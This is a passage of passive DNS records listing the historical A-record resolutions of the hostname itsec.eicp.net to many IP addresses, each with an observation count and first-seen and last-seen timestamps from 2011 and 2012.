last seen 2012-11-02 00:40:06 -0000
itsec.eicp.net. A 114.248.88.125

count 3
first seen 2012-05-17 06:12:47 -0000
last seen 2012-05-17 06:30:31 -0000
itsec.eicp.net. A 114.248.88.142

count 34
first seen 2012-11-19 01:19:57 -0000
last seen 2012-11-20 10:19:57 -0000
itsec.eicp.net. A 114.248.88.144

count 3
first seen 2012-08-28 07:40:05 -0000
last seen 2012-08-28 09:20:04 -0000
itsec.eicp.net. A 114.248.88.166

count 170
first seen 2012-04-18 06:36:49 -0000
last seen 2012-04-18 13:50:17 -0000
itsec.eicp.net. A 114.248.88.173

count 133
first seen 2012-09-10 03:21:50 -0000
last seen 2012-09-10 05:20:08 -0000
itsec.eicp.net. A 114.248.88.225

count 294
first seen 2012-06-20 10:11:41 -0000
last seen 2012-06-20 15:04:34 -0000
itsec.eicp.net. A 114.248.88.230

count 5
first seen 2012-11-11 00:40:01 -0000
last seen 2012-11-11 03:00:00 -0000
itsec.eicp.net. A 114.248.88.232

count 2
first seen 2012-07-24 03:20:04 -0000
last seen 2012-07-24 04:00:05 -0000
itsec.eicp.net. A 114.248.88.241

count 2
first seen 2012-08-31 02:20:04 -0000
last seen 2012-08-31 02:40:02 -0000
itsec.eicp.net. A 114.248.89.6

count 25
first seen 2012-11-13 02:20:01 -0000
last seen 2012-11-13 22:39:59 -0000
itsec.eicp.net. A 114.248.89.12

count 282
first seen 2012-06-11 06:50:07 -0000
last seen 2012-06-11 23:35:49 -0000
itsec.eicp.net. A 114.248.89.63

count 5
first seen 2012-06-18 06:11:35 -0000
last seen 2012-06-18 09:20:04 -0000
itsec.eicp.net. A 114.248.89.144

count 2
first seen 2012-07-12 02:29:59 -0000
last seen 2012-07-12 03:14:59 -0000
itsec.eicp.net. A 114.248.89.189

count 3
first seen 2012-11-29 12:00:00 -0000
last seen 2012-11-29 13:40:00 -0000
itsec.eicp.net. A 114.248.89.221

count 2
first seen 2012-05-03 07:19:38 -0000
last seen 2012-05-03 08:19:36 -0000
itsec.eicp.net. A 114.248.90.28

count 5
first seen 2012-09-20 00:07:59 -0000
last seen 2012-09-20 03:43:09 -0000
itsec.eicp.net. A 114.248.90.60

count 1
first seen 2011-12-19 02:35:13 -0000
last seen 2011-12-19 02:35:13 -0000
itsec.eicp.net. A 114.248.90.143

count 17
first seen 2012-11-26 23:59:54 -0000
last seen 2012-11-27 13:19:54 -0000
itsec.eicp.net. A 114.248.90.185

count 6
first seen 2012-04-09 01:49:48 -0000
last seen 2012-04-09 02:03:52 -0000
itsec.eicp.net. A 114.248.90.189

count 22
first seen 2012-10-19 01:56:29 -0000
last seen 2012-10-19 09:44:36 -0000
itsec.eicp.net. A 114.248.90.216

count 5
first seen 2012-05-23 06:49:23 -0000
last seen 2012-05-23 10:19:19 -0000
itsec.eicp.net. A 114.248.91.27

count 1
first seen 2012-05-28 06:49:16 -0000
last seen 2012-05-28 06:49:16 -0000
itsec.eicp.net. A 114.248.91.28

count 1
first seen 2012-01-11 06:35:15 -0000
last seen 2012-01-11 06:35:15 -0000
itsec.eicp.net. A 114.248.91.51

count 4
first seen 2012-06-08 06:19:10 -0000
last seen 2012-06-08 09:19:10 -0000
itsec.eicp.net. A 114.248.91.103

count 1
first seen 2012-05-02 08:49:37 -0000
last seen 2012-05-02 08:49:37 -0000
itsec.eicp.net. A 114.248.91.145

count 8
first seen 2012-09-27 23:51:38 -0000
last seen 2012-09-28 03:44:56 -0000
itsec.eicp.net. A 114.248.91.168

count 1
first seen 2012-07-05 03:15:01 -0000
last seen 2012-07-05 03:15:01 -0000
itsec.eicp.net. A 114.248.91.180

count 19
first seen 2012-06-11 23:36:50 -0000
last seen 2012-06-12 03:42:27 -0000
itsec.eicp.net. A 114.248.91.194

count 1
first seen 2012-09-24 08:00:07 -0000
last seen 2012-09-24 08:00:07 -0000
itsec.eicp.net. A 114.248.91.244

count 114
first seen 2012-04-09 02:18:41 -0000
last seen 2012-04-09 08:49:46 -0000
itsec.eicp.net. A 114.248.92.10

count 1
first seen 2012-06-13 01:52:50 -0000
last seen 2012-06-13 01:52:50 -0000
itsec.eicp.net. A 114.248.92.51

count 9
first seen 2012-07-16 07:44:57 -0000
last seen 2012-07-16 12:59:57 -0000
itsec.eicp.net. A 114.248.92.106

count 14
first seen 2012-09-05 06:16:41 -0000
last seen 2012-09-05 09:57:21 -0000
itsec.eicp.net. A 114.248.92.128

count 26
first seen 2012-10-11 00:46:03 -0000
last seen 2012-10-11 03:51:46 -0000
itsec.eicp.net. A 114.248.92.188

count 3
first seen 2012-10-31 09:20:06 -0000
last seen 2012-10-31 10:40:07 -0000
itsec.eicp.net. A 114.248.92.197

count 6
first seen 2012-07-10 01:30:00 -0000
last seen 2012-07-10 03:29:59 -0000
itsec.eicp.net. A 114.248.92.225

count 46
first seen 2012-06-19 09:50:03 -0000
last seen 2012-09-19 11:40:08 -0000
itsec.eicp.net. A 114.248.93.29

count 3
first seen 2012-07-09 07:30:00 -0000
last seen 2012-07-09 08:00:00 -0000
itsec.eicp.net. A 114.248.93.106

count 10
first seen 2012-04-05 03:27:23 -0000
last seen 2012-04-05 03:53:57 -0000
itsec.eicp.net. A 114.248.93.112

count 13
first seen 2012-05-07 06:49:34 -0000
last seen 2012-05-07 12:19:34 -0000
itsec.eicp.net. A 114.248.93.138

count 8
first seen 2012-07-23 07:00:06 -0000
last seen 2012-07-23 13:00:05 -0000
itsec.eicp.net. A 114.248.93.150

count 4
first seen 2012-10-15 00:20:18 -0000
last seen 2012-10-15 01:33:34 -0000
itsec.eicp.net. A 114.248.93.169

count 21
first seen 2012-06-24 00:20:03 -0000
last seen 2012-06-24 04:06:32 -0000
itsec.eicp.net. A 114.248.93.192

count 35
first seen 2012-04-11 00:21:05 -0000
last seen 2012-04-11 04:20:54 -0000
itsec.eicp.net. A 114.248.93.199

count 1
first seen 2012-06-20 06:28:31 -0000
last seen 2012-06-20 06:28:31 -0000
itsec.eicp.net. A 114.248.93.223

count 3
first seen 2012-11-15 00:59:59 -0000
last seen 2012-11-15 01:40:00 -0000
itsec.eicp.net. A 114.248.93.225

count 1
first seen 2012-07-19 08:00:06 -0000
last seen 2012-07-19 08:00:06 -0000
itsec.eicp.net. A 114.248.94.157

count 3
first seen 2012-07-20 03:00:06 -0000
last seen 2012-07-20 03:03:12 -0000
itsec.eicp.net. A 114.248.94.207

count 8
first seen 2012-10-02 06:20:04 -0000
last seen 2012-10-02 13:40:04 -0000
itsec.eicp.net. A 114.248.94.208

count 8
first seen 2012-11-15 23:59:59 -0000
last seen 2012-11-16 07:19:58 -0000
itsec.eicp.net. A 114.248.94.220

count 3
first seen 2012-05-28 06:05:51 -0000
last seen 2012-05-28 06:19:16 -0000
itsec.eicp.net. A 114.248.95.49

count 1
first seen 2011-09-07 14:31:57 -0000
last seen 2011-09-07 14:31:57 -0000
itsec.eicp.net. A 114.248.95.59

count 88
first seen 2012-09-04 00:33:12 -0000
last seen 2012-09-04 02:34:42 -0000
itsec.eicp.net. A 114.248.95.76

count 2
first seen 2012-07-19 08:30:06 -0000
last seen 2012-07-19 10:00:06 -0000
itsec.eicp.net. A 114.248.95.122

count 4
first seen 2012-05-17 07:19:20 -0000
last seen 2012-05-17 07:49:23 -0000
itsec.eicp.net. A 114.248.95.252

count 8
first seen 2012-05-16 12:05:48 -0000
last seen 2012-05-16 12:45:20 -0000
itsec.eicp.net. A 114.248.98.177

count 11
first seen 2012-05-02 13:19:37 -0000
last seen 2012-05-02 13:51:40 -0000
itsec.eicp.net. A 114.248.100.22

count 28
first seen 2012-05-09 12:01:20 -0000
last seen 2012-05-09 13:26:36 -0000
itsec.eicp.net. A 114.248.100.174

count 3
first seen 2012-09-10 06:40:08 -0000
last seen 2012-09-10 09:00:08 -0000
itsec.eicp.net. A 114.248.102.191

count 3
first seen 2012-08-03 07:00:01 -0000
last seen 2012-08-03 08:40:00 -0000
itsec.eicp.net. A 114.248.103.1

count 5
first seen 2012-06-24 13:50:03 -0000
last seen 2012-06-24 17:20:03 -0000
itsec.eicp.net. A 114.248.103.54

count 14
first seen 2012-09-02 02:58:14 -0000
last seen 2012-09-02 03:44:25 -0000
itsec.eicp.net. A 114.248.104.3

count 12
first seen 2012-06-28 13:50:01 -0000
last seen 2012-06-28 21:20:01 -0000
itsec.eicp.net. A 114.248.105.118

count 3
first seen 2012-07-25 08:20:03 -0000
last seen 2012-07-25 09:00:03 -0000
itsec.eicp.net. A 114.248.107.97

count 13
first seen 2012-11-11 03:40:01 -0000
last seen 2012-11-11 15:40:01 -0000
itsec.eicp.net. A 114.248.107.233

count 1
first seen 2012-04-27 09:19:34 -0000
last seen 2012-04-27 09:19:34 -0000
itsec.eicp.net. A 114.248.108.73

count 2
first seen 2012-11-29 09:39:53 -0000
last seen 2012-11-29 10:39:59 -0000
itsec.eicp.net. A 114.248.109.170

count 10
first seen 2012-02-28 03:19:50 -0000
last seen 2012-02-28 13:19:49 -0000
itsec.eicp.net. A 114.249.17.36

count 32
first seen 2012-03-28 11:59:24 -0000
last seen 2012-03-28 13:44:38 -0000
itsec.eicp.net. A 114.249.21.11

count 74
first seen 2012-03-05 01:41:15 -0000
last seen 2012-03-05 15:02:57 -0000
itsec.eicp.net. A 114.249.23.24

count 21
first seen 2012-03-21 13:35:45 -0000
last seen 2012-03-21 15:13:14 -0000
itsec.eicp.net. A 114.249.26.166

count 8
first seen 2012-03-10 13:52:18 -0000
last seen 2012-03-10 15:16:01 -0000
itsec.eicp.net. A 114.249.30.18

count 53
first seen 2012-03-20 01:25:21 -0000
last seen 2012-03-20 10:34:03 -0000
itsec.eicp.net. A 114.249.30.231

count 15
first seen 2012-03-15 12:11:48 -0000
last seen 2012-03-15 14:45:57 -0000
itsec.eicp.net. A 114.249.192.233

count 50
first seen 2012-03-09 07:19:43 -0000
last seen 2012-03-09 14:53:10 -0000
itsec.eicp.net. A 114.249.192.240

count 56
first seen 2012-03-30 00:17:00 -0000
last seen 2012-03-30 04:22:44 -0000
itsec.eicp.net. A 114.249.193.21

count 1
first seen 2012-02-28 01:49:50 -0000
last seen 2012-02-28 01:49:50 -0000
itsec.eicp.net. A 114.249.193.224

count 28
first seen 2012-03-09 01:21:32 -0000
last seen 2012-03-09 05:55:27 -0000
itsec.eicp.net. A 114.249.198.34

count 7
first seen 2012-03-27 01:24:16 -0000
last seen 2012-03-27 02:29:48 -0000
itsec.eicp.net. A 114.249.200.189

count 23
first seen 2012-03-16 01:30:34 -0000
last seen 2012-03-16 05:26:15 -0000
itsec.eicp.net. A 114.249.201.179

count 30
first seen 2012-03-24 01:53:23 -0000
last seen 2012-03-24 05:37:36 -0000
itsec.eicp.net. A 114.249.202.183

count 58
first seen 2012-03-28 00:33:12 -0000
last seen 2012-03-28 03:51:41 -0000
itsec.eicp.net. A 114.249.202.186

count 8
first seen 2012-02-29 08:49:49 -0000
last seen 2012-02-29 16:19:50 -0000
itsec.eicp.net. A 114.249.203.14

count 9
first seen 2012-03-26 08:22:42 -0000
last seen 2012-03-26 08:54:46 -0000
itsec.eicp.net. A 114.249.204.84

count 30
first seen 2012-03-21 07:19:59 -0000
last seen 2012-03-21 09:26:15 -0000
itsec.eicp.net. A 114.249.204.158

count 3
first seen 2012-03-12 01:35:41 -0000
last seen 2012-03-12 01:51:21 -0000
itsec.eicp.net. A 114.249.204.231

count 3
first seen 2012-03-27 08:27:16 -0000
last seen 2012-03-27 14:19:55 -0000
itsec.eicp.net. A 114.249.205.239

count 8
first seen 2012-03-01 04:19:49 -0000
last seen 2012-03-01 10:19:47 -0000
itsec.eicp.net. A 114.249.207.180

count 70
first seen 2012-06-21 13:26:52 -0000
last seen 2012-06-21 14:34:21 -0000
itsec.eicp.net. A 115.170.0.45

count 5
first seen 2012-06-30 00:20:07 -0000
last seen 2012-06-30 04:40:02 -0000
itsec.eicp.net. A 115.170.0.72

count 192
first seen 2012-04-18 14:12:26 -0000
last seen 2012-04-19 00:11:06 -0000
itsec.eicp.net. A 115.170.1.206

count 287
first seen 2012-06-16 11:20:05 -0000
last seen 2012-06-17 11:50:04 -0000
itsec.eicp.net. A 115.170.3.87

count 391
first seen 2012-09-12 15:40:10 -0000
last seen 2012-09-13 00:50:52 -0000
itsec.eicp.net. A 115.170.4.125

count 13
first seen 2012-06-14 04:19:58 -0000
last seen 2012-06-14 14:20:05 -0000
itsec.eicp.net. A 115.170.4.175

count 4
first seen 2012-08-31 04:56:29 -0000
last seen 2012-08-31 06:20:07 -0000
itsec.eicp.net. A 115.170.5.17

count 136
first seen 2012-05-28 12:49:16 -0000
last seen 2012-05-29 00:49:16 -0000
itsec.eicp.net. A 115.170.6.11

count 26
first seen 2012-07-01 02:02:20 -0000
last seen 2012-07-01 13:45:02 -0000
itsec.eicp.net. A 115.170.6.203

count 71
first seen 2012-03-05 16:10:54 -0000
last seen 2012-03-06 01:16:27 -0000
itsec.eicp.net. A 115.170.6.252

count 24
first seen 2012-04-27 13:40:04 -0000
last seen 2012-04-27 14:42:03 -0000
itsec.eicp.net. A 115.170.10.130

count 112
first seen 2012-06-09 01:39:17 -0000
last seen 2012-06-09 09:49:09 -0000
itsec.eicp.net. A 115.170.10.225

count 5
first seen 2012-07-26 13:20:02 -0000
last seen 2012-07-26 15:40:02 -0000
itsec.eicp.net. A 115.170.11.251

count 32
first seen 2012-05-15 23:58:08 -0000
last seen 2012-05-16 00:46:49 -0000
itsec.eicp.net. A 115.170.14.14

count 3
first seen 2012-09-11 04:40:10 -0000
last seen 2012-09-11 05:40:11 -0000
itsec.eicp.net. A 115.170.19.79

count 12
first seen 2012-06-27 12:50:01 -0000
last seen 2012-06-28 03:50:00 -0000
itsec.eicp.net. A 115.170.20.200

count 20
first seen 2012-07-07 13:45:00 -0000
last seen 2012-07-07 21:44:59 -0000
itsec.eicp.net. A 115.170.21.112

count 26
first seen 2012-05-08 14:19:33 -0000
last seen 2012-05-08 15:23:49 -0000
itsec.eicp.net. A 115.170.23.254

count 380
first seen 2012-05-27 13:19:17 -0000
last seen 2012-05-27 22:56:10 -0000
itsec.eicp.net. A 115.170.24.217

count 51
first seen 2012-06-20 05:22:38 -0000
last seen 2012-06-20 06:28:00 -0000
itsec.eicp.net. A 115.170.24.219

count 3
first seen 2012-05-16 04:38:28 -0000
last seen 2012-05-16 05:08:20 -0000
itsec.eicp.net. A 115.170.24.220

count 354
first seen 2012-06-30 05:40:04 -0000
last seen 2012-07-01 02:02:03 -0000
itsec.eicp.net. A 115.170.30.49

count 303
first seen 2012-05-18 05:53:37 -0000
last seen 2012-05-19 11:19:21 -0000
itsec.eicp.net. A 115.170.31.215

count 328
first seen 2012-05-12 02:10:10 -0000
last seen 2012-05-13 01:24:06 -0000
itsec.eicp.net. A 115.170.32.58

count 2
first seen 2012-07-03 10:15:01 -0000
last seen 2012-07-03 10:45:01 -0000
itsec.eicp.net. A 115.170.32.65

count 1
first seen 2011-12-30 04:33:08 -0000
last seen 2011-12-30 04:33:08 -0000
itsec.eicp.net. A 115.170.32.127

count 13
first seen 2012-08-30 11:00:02 -0000
last seen 2012-08-30 16:17:22 -0000
itsec.eicp.net. A 115.170.33.1

count 3
first seen 2012-07-02 04:30:01 -0000
last seen 2012-07-02 05:15:01 -0000
itsec.eicp.net. A 115.170.34.247

count 240
first seen 2012-07-11 13:59:58 -0000
last seen 2012-07-12 00:55:06 -0000
itsec.eicp.net. A 115.170.35.169

count 5
first seen 2012-04-07 08:28:38 -0000
last seen 2012-04-07 08:49:09 -0000
itsec.eicp.net. A 115.170.35.185

count 2
first seen 2012-06-17 12:50:04 -0000
last seen 2012-06-17 15:20:07 -0000
itsec.eicp.net. A 115.170.39.112

count 509
first seen 2012-08-22 07:40:06 -0000
last seen 2012-08-23 01:17:48 -0000
itsec.eicp.net. A 115.170.39.228

count 245
first seen 2012-07-01 15:00:02 -0000
last seen 2012-07-02 00:08:49 -0000
itsec.eicp.net. A 115.170.40.230

count 501
first seen 2012-06-20 15:05:35 -0000
last seen 2012-06-20 22:34:16 -0000
itsec.eicp.net. A 115.170.41.43

count 1
first seen 2012-01-14 16:35:28 -0000
last seen 2012-01-14 16:35:28 -0000
itsec.eicp.net. A 115.170.43.78

count 2
first seen 2012-06-24 04:20:06 -0000
last seen 2012-06-24 04:50:04 -0000
itsec.eicp.net. A 115.170.45.173

count 2
first seen 2012-07-25 05:00:03 -0000
last seen 2012-07-25 06:00:03 -0000
itsec.eicp.net. A 115.170.46.2

count 2
first seen 2012-07-27 14:00:03 -0000
last seen 2012-07-27 15:20:01 -0000
itsec.eicp.net. A 115.170.47.39

count 1
first seen 2011-12-26 14:33:05 -0000
last seen 2011-12-26 14:33:05 -0000
itsec.eicp.net. A 115.170.48.38

count 33
first seen 2012-03-07 06:03:05 -0000
last seen 2012-03-07 11:39:13 -0000
itsec.eicp.net. A 115.170.49.223

count 13
first seen 2012-05-17 04:21:44 -0000
last seen 2012-05-17 05:49:23 -0000
itsec.eicp.net. A 115.170.52.198

count 7
first seen 2012-10-06 06:00:04 -0000
last seen 2012-10-06 08:40:03 -0000
itsec.eicp.net. A 115.170.57.211

count 3
first seen 2012-07-03 05:00:01 -0000
last seen 2012-07-03 05:45:01 -0000
itsec.eicp.net. A 115.170.60.1

count 51
first seen 2012-04-11 13:46:41 -0000
last seen 2012-04-11 16:19:13 -0000
itsec.eicp.net. A 115.170.61.137

count 34
first seen 2012-05-09 10:10:56 -0000
last seen 2012-05-09 11:54:41 -0000
itsec.eicp.net. A 115.170.61.218

count 1
first seen 2011-10-17 21:37:17 -0000
last seen 2011-10-17 21:37:17 -0000
itsec.eicp.net. A 115.170.62.54

count 9
first seen 2012-11-01 15:40:07 -0000
last seen 2012-11-01 23:40:06 -0000
itsec.eicp.net. A 115.170.63.149

count 22
first seen 2012-07-09 14:14:59 -0000
last seen 2012-07-10 01:14:59 -0000
itsec.eicp.net. A 115.170.63.221

count 4
first seen 2012-05-13 07:49:17 -0000
last seen 2012-05-13 08:11:58 -0000
itsec.eicp.net. A 115.170.66.117

count 4
first seen 2012-07-16 04:30:00 -0000
last seen 2012-07-16 06:44:58 -0000
itsec.eicp.net. A 115.170.67.98

count 5
first seen 2012-09-06 04:08:28 -0000
last seen 2012-09-06 05:00:09 -0000
itsec.eicp.net. A 115.170.67.116

count 63
first seen 2012-05-11 03:57:26 -0000
last seen 2012-05-11 15:31:09 -0000
itsec.eicp.net. A 115.170.68.177

count 17
first seen 2012-07-21 14:30:05 -0000
last seen 2012-07-22 03:00:06 -0000
itsec.eicp.net. A 115.170.69.142

count 624
first seen 2012-08-21 14:00:06 -0000
last seen 2012-08-22 06:20:06 -0000
itsec.eicp.net. A 115.170.69.155

count 11
first seen 2012-06-29 04:50:00 -0000
last seen 2012-06-29 17:19:59 -0000
itsec.eicp.net. A 115.170.70.102

count 13
first seen 2012-11-26 12:39:53 -0000
last seen 2012-11-26 22:59:53 -0000
itsec.eicp.net. A 115.170.96.32

count 1
first seen 2012-01-09 04:34:10 -0000
last seen 2012-01-09 04:34:10 -0000
itsec.eicp.net. A 115.170.96.119

count 247
first seen 2012-10-04 00:08:32 -0000
last seen 2012-10-04 07:40:04 -0000
itsec.eicp.net. A 115.170.97.50

count 11
first seen 2012-11-09 15:20:02 -0000
last seen 2012-11-09 21:40:01 -0000
itsec.eicp.net. A 115.170.97.137

count 16
first seen 2012-11-18 12:19:57 -0000
last seen 2012-11-18 23:19:57 -0000
itsec.eicp.net. A 115.170.97.141

count 20
first seen 2012-11-03 08:20:05 -0000
last seen 2012-11-04 01:20:05 -0000
itsec.eicp.net. A 115.170.97.235

count 37
first seen 2012-11-17 14:51:40 -0000
last seen 2012-11-18 11:19:58 -0000
itsec.eicp.net. A 115.170.99.40

count 8
first seen 2012-09-18 04:18:57 -0000
last seen 2012-09-18 06:00:09 -0000
itsec.eicp.net. A 115.170.99.132

count 316
first seen 2012-10-16 18:51:32 -0000
last seen 2012-10-16 23:47:57 -0000
itsec.eicp.net. A 115.170.99.217

count 3
first seen 2012-02-29 03:49:49 -0000
last seen 2012-02-29 07:49:49 -0000
itsec.eicp.net. A 115.170.100.226

count 457
first seen 2012-09-30 08:20:05 -0000
last seen 2012-10-01 11:00:04 -0000
itsec.eicp.net. A 115.170.102.87

count 3
first seen 2012-09-21 05:20:07 -0000
last seen 2012-09-21 06:40:08 -0000
itsec.eicp.net. A 115.170.102.194

count 1
first seen 2011-12-25 06:33:22 -0000
last seen 2011-12-25 06:33:22 -0000
itsec.eicp.net. A 115.170.102.206

count 225
first seen 2012-09-22 14:29:13 -0000
last seen 2012-09-23 01:25:41 -0000
itsec.eicp.net. A 115.170.103.21

count 3
first seen 2012-09-28 12:40:06 -0000
last seen 2012-09-28 14:20:06 -0000
itsec.eicp.net. A 115.170.103.64

count 1
first seen 2011-11-14 04:33:35 -0000
last seen 2011-11-14 04:33:35 -0000
itsec.eicp.net. A 115.170.103.103

count 2
first seen 2012-09-27 05:20:06 -0000
last seen 2012-09-27 05:40:06 -0000
itsec.eicp.net. A 115.170.104.14

count 543
first seen 2012-10-04 08:00:04 -0000
last seen 2012-10-04 23:24:53 -0000
itsec.eicp.net. A 115.170.105.79

count 65
first seen 2012-10-25 17:00:09 -0000
last seen 2012-10-25 19:46:28 -0000
itsec.eicp.net. A 115.170.105.173

count 77
first seen 2012-12-01 14:00:20 -0000
last seen 2012-12-02 23:00:20 -0000
itsec.eicp.net. A 115.170.105.238

count 15
first seen 2012-11-22 10:59:56 -0000
last seen 2012-11-22 23:19:55 -0000
itsec.eicp.net. A 115.170.106.113

count 268
first seen 2012-10-04 23:25:26 -0000
last seen 2012-10-06 04:54:53 -0000
itsec.eicp.net. A 115.170.106.227

count 15
first seen 2012-08-01 08:40:01 -0000
last seen 2012-08-01 23:00:01 -0000
itsec.eicp.net. A 115.170.107.36

count 1
first seen 2011-09-01 21:32:44 -0000
last seen 2011-09-01 21:32:44 -0000
itsec.eicp.net. A 115.170.107.103

count 1
first seen 2012-09-26 14:00:07 -0000
last seen 2012-09-26 14:00:07 -0000
itsec.eicp.net. A 115.170.108.94

count 17
first seen 2012-12-04 14:00:20 -0000
last seen 2012-12-04 23:40:20 -0000
itsec.eicp.net. A 115.170.109.87

count 30
first seen 2012-07-08 12:15:00 -0000
last seen 2012-07-09 02:14:59 -0000
itsec.eicp.net. A 115.170.110.15

count 18
first seen 2012-07-28 08:00:04 -0000
last seen 2012-07-29 00:00:02 -0000
itsec.eicp.net. A 115.170.110.230

count 116
first seen 2012-03-27 14:57:51 -0000
last seen 2012-03-27 23:27:01 -0000
itsec.eicp.net. A 115.170.112.223

count 1
first seen 2012-01-15 18:33:01 -0000
last seen 2012-01-15 18:33:01 -0000
itsec.eicp.net. A 115.170.113.118

count 163
first seen 2012-10-12 23:39:37 -0000
last seen 2012-10-13 11:00:16 -0000
itsec.eicp.net. A 115.170.114.6

count 3
first seen 2012-10-09 01:40:31 -0000
last seen 2012-10-09 01:41:16 -0000
itsec.eicp.net. A 115.170.114.17

count 30
first seen 2012-05-14 11:08:56 -0000
last seen 2012-05-14 15:36:08 -0000
itsec.eicp.net. A 115.170.114.108

count 102
first seen 2012-04-13 11:28:25 -0000
last seen 2012-04-13 16:51:11 -0000
itsec.eicp.net. A 115.170.115.199

count 106
first seen 2012-04-16 10:32:47 -0000
last seen 2012-04-16 15:16:54 -0000
itsec.eicp.net. A 115.170.117.59

count 5
first seen 2012-05-13 15:45:51 -0000
last seen 2012-05-13 15:53:24 -0000
itsec.eicp.net. A 115.170.118.48

count 0
first seen 2011-12-12 16:31:31 -0000
last seen 2011-12-12 16:31:31 -0000
itsec.eicp.net. A 115.170.120.127

count 4
first seen 2012-07-18 14:30:06 -0000
last seen 2012-07-18 16:00:06 -0000
itsec.eicp.net. A 115.170.122.87

count 5
first seen 2012-10-12 04:04:33 -0000
last seen 2012-10-12 08:40:15 -0000
itsec.eicp.net. A 115.170.124.23

count 6
first seen 2012-08-23 05:20:06 -0000
last seen 2012-08-23 08:20:09 -0000
itsec.eicp.net. A 115.170.125.97

count 2063
first seen 2012-08-23 09:20:06 -0000
last seen 2012-08-27 00:12:31 -0000
itsec.eicp.net. A 115.170.126.173

count 3
first seen 2012-05-23 04:15:56 -0000
last seen 2012-05-23 05:49:21 -0000
itsec.eicp.net. A 115.170.128.43

count 2
first seen 2012-07-20 04:30:06 -0000
last seen 2012-07-20 06:00:06 -0000
itsec.eicp.net. A 115.170.128.72

count 19
first seen 2012-11-02 04:20:07 -0000
last seen 2012-11-02 18:00:13 -0000
itsec.eicp.net. A 115.170.128.140

count 2
first seen 2012-09-20 04:19:43 -0000
last seen 2012-09-20 04:40:08 -0000
itsec.eicp.net. A 115.170.129.116

count 8
first seen 2012-05-19 11:49:24 -0000
last seen 2012-05-19 16:11:29 -0000
itsec.eicp.net. A 115.170.129.176

count 380
first seen 2012-06-01 04:49:15 -0000
last seen 2012-06-02 00:45:26 -0000
itsec.eicp.net. A 115.170.129.181

count 1
first seen 2011-08-23 14:35:18 -0000
last seen 2011-08-23 14:35:18 -0000
itsec.eicp.net. A 115.170.129.183

count 16
first seen 2012-11-04 13:20:05 -0000
last seen 2012-11-04 23:20:06 -0000
itsec.eicp.net. A 115.170.130.74

count 1
first seen 2012-05-22 14:19:20 -0000
last seen 2012-05-22 14:19:20 -0000
itsec.eicp.net. A 115.170.131.4

count 108
first seen 2012-09-19 12:40:09 -0000
last seen 2012-09-20 00:07:44 -0000
itsec.eicp.net. A 115.170.131.191

count 7
first seen 2012-05-23 15:49:23 -0000
last seen 2012-05-23 21:49:18 -0000
itsec.eicp.net. A 115.170.132.122

count 12
first seen 2012-06-19 04:23:58 -0000
last seen 2012-06-19 04:50:04 -0000
itsec.eicp.net. A 115.170.132.123

count 6
first seen 2012-10-14 05:49:38 -0000
last seen 2012-10-14 09:40:14 -0000
itsec.eicp.net. A 115.170.133.151

count 2
first seen 2012-02-04 00:35:03 -0000
last seen 2012-02-04 02:34:21 -0000
itsec.eicp.net. A 115.170.133.165

count 12
first seen 2012-03-02 15:38:25 -0000
last seen 2012-03-02 16:51:22 -0000
itsec.eicp.net. A 115.170.133.245

count 70
first seen 2012-10-07 00:04:14 -0000
last seen 2012-10-07 06:40:03 -0000
itsec.eicp.net. A 115.170.134.107

count 7
first seen 2012-11-06 09:20:03 -0000
last seen 2012-11-06 13:00:07 -0000
itsec.eicp.net. A 115.170.134.136

count 8
first seen 2012-07-10 04:45:00 -0000
last seen 2012-07-10 07:45:00 -0000
itsec.eicp.net. A 115.170.134.225

count 2
first seen 2012-04-24 14:45:39 -0000
last seen 2012-04-24 14:56:05 -0000
itsec.eicp.net. A 115.170.135.90

count 196
first seen 2012-06-16 01:14:30 -0000
last seen 2012-06-16 08:50:05 -0000
itsec.eicp.net. A 115.170.136.213

count 16
first seen 2012-11-10 11:00:01 -0000
last seen 2012-11-10 23:00:00 -0000
itsec.eicp.net. A 115.170.137.130

count 51
first seen 2012-05-04 15:11:02 -0000
last seen 2012-05-04 18:18:19 -0000
itsec.eicp.net. A 115.170.138.16

count 470
first seen 2012-06-22 01:49:51 -0000
last seen 2012-06-22 13:54:33 -0000
itsec.eicp.net. A 115.170.138.132

count 1
first seen 2012-06-27 04:50:02 -0000
last seen 2012-06-27 04:50:02 -0000
itsec.eicp.net. A 115.170.139.90

count 1
first seen 2012-06-28 06:20:01 -0000
last seen 2012-06-28 06:20:01 -0000
itsec.eicp.net. A 115.170.140.232

count 105
first seen 2012-05-24 18:49:19 -0000
last seen 2012-05-25 00:28:11 -0000
itsec.eicp.net. A 115.170.142.183

count 204
first seen 2012-06-02 00:46:39 -0000
last seen 2012-06-03 06:19:13 -0000
itsec.eicp.net. A 115.170.146.231

count 9
first seen 2012-06-21 04:06:20 -0000
last seen 2012-06-21 05:50:02 -0000
itsec.eicp.net. A 115.170.146.253

count 17
first seen 2012-06-22 13:55:37 -0000
last seen 2012-06-22 16:13:33 -0000
itsec.eicp.net. A 115.170.153.134

count 1
first seen 2012-06-25 04:20:03 -0000
last seen 2012-06-25 04:20:03 -0000
itsec.eicp.net. A 115.170.153.135

count 54
first seen 2012-03-06 16:49:44 -0000
last seen 2012-03-06 23:20:30 -0000
itsec.eicp.net. A 115.170.157.205

count 17
first seen 2012-09-21 23:51:18 -0000
last seen 2012-09-22 13:00:08 -0000
itsec.eicp.net. A 115.170.162.122

count 13
first seen 2012-06-25 11:50:02 -0000
last seen 2012-06-25 23:20:02 -0000
itsec.eicp.net. A 115.170.163.131

count 2
first seen 2012-06-26 04:50:02 -0000
last seen 2012-06-26 05:20:04 -0000
itsec.eicp.net. A 115.170.163.155

count 165
first seen 2012-08-31 11:00:03 -0000
last seen 2012-08-31 21:26:31 -0000
itsec.eicp.net. A 115.170.166.32

count 12
first seen 2012-07-07 07:45:00 -0000
last seen 2012-07-07 12:29:59 -0000
itsec.eicp.net. A 115.170.166.132

count 1
first seen 2012-07-09 04:14:59 -0000
last seen 2012-07-09 04:14:59 -0000
itsec.eicp.net. A 115.170.166.133

count 1
first seen 2011-09-19 15:58:28 -0000
last seen 2011-09-19 15:58:28 -0000
itsec.eicp.net. A 115.170.168.33

count 39
first seen 2012-05-10 04:17:06 -0000
last seen 2012-05-10 06:11:55 -0000
itsec.eicp.net. A 115.170.170.122

count 26
first seen 2012-07-05 10:45:00 -0000
last seen 2012-07-06 02:15:00 -0000
itsec.eicp.net. A 115.170.171.171

count 2
first seen 2012-05-22 04:49:20 -0000
last seen 2012-05-22 05:19:21 -0000
itsec.eicp.net. A 115.170.172.161

count 8
first seen 2012-05-01 06:19:38 -0000
last seen 2012-05-01 12:49:38 -0000
itsec.eicp.net. A 115.170.173.8

count 1
first seen 2012-07-07 00:45:00 -0000
